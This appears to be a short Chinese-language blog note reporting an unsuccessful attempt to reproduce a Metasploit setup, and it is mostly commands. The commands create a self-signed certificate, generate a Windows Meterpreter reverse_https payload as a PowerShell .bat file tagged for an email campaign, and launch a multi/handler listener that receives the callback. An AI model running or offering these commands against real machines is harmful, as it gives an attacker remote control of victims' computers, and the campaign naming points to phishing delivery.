复现结果

未测试成功,参考网上基本都是差不多一样的文章。

操作代码

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=your_ip_or_domain" -keyout your_ip_or_domain.key -out your_ip_or_domain.crt
cat your_ip_or_domain.key  your_ip_or_domain.crt > your_ip_or_domain.pem
rm -f your_ip_or_domain.key  your_ip_or_domain.crt
msfvenom -p windows/meterpreter/reverse_https LHOST=your_ip_or_domain LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=/root/msf/your_ip_or_domain.pem StagerVerifySSLCert=true PayloadUUIDName=EmailCampaign20150101 -f psh-cmd -o launch-paranoid.bat
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_https; set LHOST your_ip_or_domain; set LPORT 443; set HandlerSSLCert /root/msf/your_ip_or_domain.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j"

参考链接

rapid7/metasploit